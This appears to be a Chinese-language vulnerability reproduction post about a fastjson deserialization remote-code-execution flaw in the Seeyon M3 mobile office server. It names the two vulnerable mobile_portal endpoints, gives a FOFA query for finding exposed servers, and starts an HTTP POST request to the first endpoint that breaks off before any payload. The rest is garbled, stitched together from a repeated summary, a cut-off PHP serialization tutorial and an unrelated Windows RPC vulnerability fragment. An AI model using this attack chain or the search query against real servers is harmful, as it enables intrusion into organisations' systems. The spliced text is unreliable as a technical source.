0x01 产品简介

M3移动办公是致远互联打造的一站式智能工作平台，提供全方位的企业移动业务管理，致力于构建以人为中心的智能化移动应用场景，促进人员工作积极性和创造力，提升企业效率和效能，是为企业量身定制的移动智慧协同平台。

0x02 漏洞概述

致远M3 server中 mobile_portal 接口处 发现了fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。

0x03 复现环境

FOFA：title="M3-Server"

0x04 漏洞复现

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,

致远M3 server中 mobile_portal接口处发现了fastjson反序列化漏洞，漏洞是通过接口/mobile_portal/api/pns/message/send/batch/6_1sp1将恶意payload存入日志中，然后利用/mobile_portal/api/systemLog/pns/loadLog/app.log接口会将日志中的JSON数据进行反序列化的机制触发Fastjson漏洞,造成反序列化远程代码执行。 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中，序列化和 反序列化 一般用做缓存，比如session缓存，cookie等。 常见的序列化格式： 二进制格式 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; $s=new S(); //创建一个对象 serialize($s 漏洞 等级：高危 漏洞 影响：服务器服务中的 漏洞 可能允许 远程 执行 代码 受影响的操作系统： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞 原理：攻击者通过特制的RPC请求发给存在 漏洞 的主机，将可导...